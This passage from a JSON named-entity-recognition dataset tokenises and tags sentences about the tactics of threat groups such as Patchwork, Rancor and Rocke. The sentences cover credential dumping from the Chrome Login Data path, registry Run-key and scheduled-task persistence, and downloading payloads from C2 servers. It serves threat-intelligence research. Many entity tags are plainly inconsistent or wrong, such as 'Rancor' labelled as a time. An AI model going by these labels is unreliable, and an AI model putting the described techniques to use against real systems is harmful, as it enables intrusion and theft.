"companies", - "that", - "were", - "later", - "used", - "to", - "sign", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "obfuscated", - "a", - "script", - "with", - "Crypto", - "Obfuscator." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Patchwork", - "dumped", - "the", - "login", - "data", - "database", - "from", - "<code>\\AppData\\Local\\Google\\Chrome\\User", - "Data\\Default\\Login", - "Data</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Patchwork", - ".dll", - "that", - "contains", - "BADNEWS", - "is", - "loaded", - "and", - "executed", - "using", - "DLL", - "side-loading." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Patchwork", - "collected", - "and", - "exfiltrated", - "files", - "from", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "hides", - "base64-encoded", - "and", - "encrypted", - "C2", - "server", - "locations", - "in", - "comments", - "on", - "legitimate", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "used", - "watering", - "holes", - "to", - "deliver", - "files", - "with", - "exploits", - "to", - "initial", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "leveraged", - "the", - "DDE", - "protocol", - "to", - "deliver", - "their", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "uses", - "malicious", - "documents", - "to", - "deliver", - "remote", - "execution", - "exploits", - "as", - "part", - "of.", - "The", - "group", - "has", - "previously", - "exploited", - "CVE-2017-8570,", - "CVE-2012-1856,", - "CVE-2014-4114,", - "CVE-2017-0199,", - "CVE-2017-11882,", - "and", - "CVE-2015-1641." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Patchwork", - "removed", - "certain", - "files", - "and", - "replaced", - "them", - "so", - "they", - "could", - "not", - "be", - "retrieved." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Patchwork", - "payload", - "has", - "searched", - "all", - "fixed", - "drives", - "on", - "the", - "victim", - "for", - "files", - "matching", - "a", - "specified", - "list", - "of", - "extensions." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "apparently", - "altered", - "NDiskMonitor", - "samples", - "by", - "adding", - "four", - "bytes", - "of", - "random", - "letters", - "in", - "a", - "likely", - "attempt", - "to", - "change", - "the", - "file", - "hashes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "payloads", - "download", - "additional", - "files", - "from", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "copied", - "all", - "targeted", - "files", - "to", - "a", - "directory", - "called", - "index", - "that", - "was", - "eventually", - "uploaded", - "to", - "the", - "C&C", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "embedded", - "a", - "malicious", - "macro", - "in", - "a", - "Word", - "document", - "and", - "lured", - "the", - "victim", - "to", - "click", - "on", - "an", - "icon", - "to", - "execute", - "the", - "malware." - ], - "ner_tags": [ - "B-Idus", - "B-Way", - "O", - "B-Way", - "B-Way", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "used", - "spearphishing", - "with", - "links", - "to", - "try", - "to", - "get", - "users", - "to", - "click,", - "download", - "and", - "open", - "malicious", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "installed", - "its", - "payload", - "in", - "the", - "startup", - "programs", - "folder", - "as", - "\"Baidu", - "Software", - "Update.\"", - "The", - "group", - "also", - "adds", - "its", - "second", - "stage", - "payload", - "to", - "the", - "startup", - "programs", - "as", - "“Net", - "Monitor.\"", - "They", - "have", - "also", - "dropped", - "QuasarRAT", - "binaries", - "as", - "files", - "named", - "microsoft_network.exe", - "and", - "crome.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "A", - "Patchwork", - "payload", - "deletes", - "Resiliency", - "Registry", - "keys", - "created", - "by", - "Microsoft", - "Office", - "applications", - "in", - "an", - "apparent", - "effort", - "to", - "trick", - "users", - "into", - "thinking", - "there", - "were", - "no", - "issues", - "during", - "application", - "runs." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "used", - "PowerSploit", - "to", - "download", - "payloads,", - "run", - "a", - "reverse", - "shell,", - "and", - "execute", - "malware", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Patchwork", - "payload", - "uses", - "process", - "hollowing", - "to", - "hide", - "the", - "UAC", - "bypass", - "vulnerability", - "exploitation", - "inside", - "svchost.exe." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "added", - "the", - "path", - "of", - "its", - "second-stage", - "malware", - "to", - "the", - "startup", - "folder", - "to", - "achieve", - "persistence.", - "One", - "of", - "its", - "file", - "stealers", - "has", - "also", - "persisted", - "by", - "adding", - "a", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "Patchwork", - "attempted", - "to", - "use", - "RDP", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Patchwork", - "file", - "stealer", - "can", - "run", - "a", - "TaskScheduler", - "DLL", - "to", - "add", - "persistence." - ], - "ner_tags": [ - "O", - "B-Idus", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "scanned", - "the", - "“Program", - "Files”", - "directories", - "for", - "a", - "directory", - "with", - "the", - "string", - "“Total", - "Security”", - "(the", - "installation", - "path", - "of", - "the", - "“360", - "Total", - "Security”", - "antivirus", - "tool)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Patchwork", - "payload", - "was", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "used", - "spearphishing", - "with", - "an", - "attachment", - "to", - "deliver", - "files", - "with", - "exploits", - "to", - "initial", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "used", - "spearphishing", - "with", - "links", - "to", - "deliver", - "files", - "with", - "exploits", - "to", - "initial", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "used", - "embedded", - "image", - "tags", - "(known", - "as", - "web", - "bugs)", - "with", - "unique,", - "per-recipient", - "tracking", - "links", - "in", - "their", - "emails", - "for", - "the", - "purpose", - "of", - "identifying", - "which", - "recipients", - "opened", - "messages." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "used", - "Base64", - "to", - "encode", - "C2", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "collected", - "the", - "victim", - "computer", - "name,", - "OS", - "version,", - "and", - "architecture", - "type", - "and", - "sent", - "the", - "information", - "to", - "its", - "C2", - "server.", - "Patchwork", - "also", - "enumerated", - "all", - "available", - "drives", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "collected", - "the", - "victim", - "username", - "and", - "whether", - "it", - "was", - "running", - "as", - "admin,", - "then", - "sent", - "the", - "information", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "has", - "obtained", - "and", - "used", - "open-source", - "tools", - "such", - "as", - "QuasarRAT." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Patchwork", - "used", - "Visual", - "Basic", - "Scripts", - "(VBS)", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Tool", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Patchwork", - "ran", - "a", - "reverse", - "shell", - "with", - "Meterpreter.", - "Patchwork", - "used", - "JavaScript", - "code", - "and", - ".SCT", - "files", - "on", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PittyTiger", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz", - "and", - "gsecdump." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PittyTiger", - "attempts", - "to", - "obtain", - "legitimate", - "credentials", - "during", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Poseidon", - "Group", - "searches", - "for", - "administrator", - "accounts", - "on", - "both", - "the", - "local", - "victim", - "machine", - "and", - "the", - "network." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Poseidon", - "Group", - "searches", - "for", - "administrator", - "accounts", - "on", - "both", - "the", - "local", - "victim", - "machine", - "and", - "the", - "network." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Poseidon", - "Group", - "tools", - "attempt", - "to", - "spoof", - "anti-virus", - "processes", - "as", - "a", - "means", - "of", - "self-defense." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Poseidon", - "Group", - "conducts", - "credential", - "dumping", - "on", - "victims,", - "with", - "a", - "focus", - "on", - "obtaining", - "credentials", - "belonging", - "to", - "domain", - "and", - "database", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Poseidon", - "Group's", - "Information", - "Gathering", - "Tool", - "(IGT)", - "includes", - "PowerShell", - "components." - ], - "ner_tags": [ - "O", - "B-Idus", - "B-HackOrg", - "I-Tool", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "After", - "compromising", - "a", - "victim,", - "Poseidon", - "Group", - "lists", - "all", - "running", - "processes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Poseidon", - "Group", - "obtains", - "and", - "saves", - "information", - "about", - "victim", - "network", - "interfaces", - "and", - "addresses." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "compromising", - "a", - "victim,", - "Poseidon", - "Group", - "discovers", - "all", - "running", - "services." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malware", - "used", - "by", - "Putter", - "Panda", - "attempts", - "to", - "terminate", - "processes", - "corresponding", - "to", - "two", - "components", - "of", - "Sophos", - "Anti-Virus", - "(SAVAdminService.exe", - "and", - "SavService.exe)." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "An", - "executable", - "dropped", - "onto", - "victims", - "by", - "Putter", - "Panda", - "aims", - "to", - "inject", - "the", - "specified", - "DLL", - "into", - "a", - "process", - "that", - "would", - "normally", - "be", - "accessing", - "the", - "network,", - "including", - "Outlook", - "Express", - "(msinm.exe),", - "Outlook", - "(outlook.exe),", - "Internet", - "Explorer", - "(iexplore.exe),", - "and", - "Firefox", - "(firefox.exe)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Idus", - "O", - "B-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Droppers", - "used", - "by", - "Putter", - "Panda", - "use", - "RC4", - "or", - "a", - "16-byte", - "XOR", - "key", - "consisting", - "of", - "the", - "bytes", - "0xA0", - "–", - "0xAF", - "to", - "obfuscate", - "payloads." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "dropper", - "used", - "by", - "Putter", - "Panda", - "installs", - "itself", - "into", - "the", - "ASEP", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "with", - "a", - "value", - "named", - "McUpdate." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "RTM", - "has", - "used", - "search", - "order", - "hijacking", - "to", - "force", - "TeamViewer", - "to", - "load", - "a", - "malicious", - "DLL." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "used", - "an", - "RSS", - "feed", - "on", - "Livejournal", - "to", - "update", - "a", - "list", - "of", - "encrypted", - "C2", - "server", - "names." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "distributed", - "its", - "malware", - "via", - "the", - "RIG", - "and", - "SUNDOWN", - "exploit", - "kits,", - "as", - "well", - "as", - "online", - "advertising", - "network", - "<code>Yandex.Direct</code>." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "attempted", - "to", - "lure", - "victims", - "into", - "opening", - "e-mail", - "attachments", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "used", - "Registry", - "run", - "keys", - "to", - "establish", - "persistence", - "for", - "the", - "RTM", - "Trojan", - "and", - "other", - "tools,", - "such", - "as", - "a", - "modified", - "version", - "of", - "TeamViewer", - "remote", - "desktop", - "software." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "used", - "a", - "modified", - "version", - "of", - "TeamViewer", - "and", - "Remote", - "Utilities", - "for", - "remote", - "access." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "I-OffAct", - "O" - ] - }, - { - "tokens": [ - "RTM", - "has", - "used", - "spearphishing", - "attachments", - "to", - "distribute", - "its", - "malware." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rancor", - "has", - "downloaded", - "additional", - "malware,", - "including", - "by", - "using", - "certutil." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Rancor", - "attempted", - "to", - "get", - "users", - "to", - "click", - "on", - "an", - "embedded", - "macro", - "within", - "a", - "Microsoft", - "Office", - "Excel", - "document", - "to", - "launch", - "their", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rancor", - "has", - "used", - "<code>msiexec</code>", - "to", - "download", - "and", - "execute", - "malicious", - "installer", - "files", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Rancor", - "launched", - "a", - "scheduled", - "task", - "to", - "gain", - "persistence", - "using", - "the", - "<code>schtasks", - "/create", - "/sc</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rancor", - "has", - "attached", - "a", - "malicious", - "document", - "to", - "an", - "email", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rancor", - "has", - "used", - "VBS", - "scripts", - "as", - "well", - "as", - "embedded", - "macros", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rancor", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Rancor", - "has", - "used", - "cmd.exe", - "to", - "execute", - "commmands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rancor", - "has", - "complied", - "VBScript-generated", - "MOF", - "files", - "into", - "WMI", - "event", - "subscriptions", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "issued", - "wget", - "requests", - "from", - "infected", - "systems", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "installed", - "an", - "\"init.d\"", - "startup", - "script", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "cleared", - "log", - "files", - "within", - "the", - "/var/log/", - "folder." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "compiled", - "malware,", - "delivered", - "to", - "victims", - "as", - ".c", - "files,", - "with", - "the", - "GNU", - "Compiler", - "Collection", - "(GCC)." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "installed", - "a", - "cron", - "job", - "that", - "downloaded", - "and", - "executed", - "files", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "used", - "Pastebin", - "to", - "check", - "the", - "version", - "of", - "beaconing", - "malware", - "and", - "redirect", - "to", - "another", - "Pastebin", - "hosting", - "updated", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "extracted", - "tar.gz", - "files", - "after", - "downloading", - "them", - "from", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "used", - "scripts", - "which", - "killed", - "processes", - "and", - "added", - "firewall", - "rules", - "to", - "block", - "traffic", - "related", - "to", - "other", - "cryptominers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "used", - "scripts", - "which", - "detected", - "and", - "uninstalled", - "antivirus", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "modified", - "/etc/ld.so.preload", - "to", - "hook", - "libc", - "functions", - "in", - "order", - "to", - "hide", - "the", - "installed", - "dropper", - "and", - "mining", - "software", - "in", - "process", - "lists." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "exploited", - "Apache", - "Struts,", - "Oracle", - "WebLogic", - "(CVE-2017-10271),", - "and", - "Adobe", - "ColdFusion", - "(CVE-2017-3066)", - "vulnerabilities", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "deleted", - "files", - "on", - "infected", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "downloaded", - "a", - "file", - "\"libprocesshider\",", - "which", - "could", - "hide", - "files", - "on", - "the", - "target", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "used", - "malware", - "to", - "download", - "additional", - "malicious", - "files", - "to", - "the", - "target", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Purp", - "B-Features", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "changed", - "file", - "permissions", - "of", - "files", - "so", - "they", - "could", - "not", - "be", - "modified." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "used", - "shell", - "scripts", - "which", - "download", - "mining", - "executables", - "and", - "saves", - "them", - "with", - "the", - "filename", - "\"java\"." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "conducted", - "scanning", - "for", - "exposed", - "TCP", - "port", - "7001", - "as", - "well", - "as", - "SSH", - "and", - "Redis", - "servers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Rocke's", - "miner", - "connects", - "to", - "a", - "C2", - "server", - "using", - "port", - "51640." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke", - "has", - "modified", - "UPX", - "headers", - "after", - "packing", - "files", - "to", - "break", - "unpackers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rocke's", - "miner,", - "\"TermsHost.exe\",", - "evaded", - "defenses", - "by", - "injecting", - "itself", - "into", - "Windows", - "processes,", - "including", - "Notepad.exe." - ], - "ner_tags": [ - "B-HackOrg", - 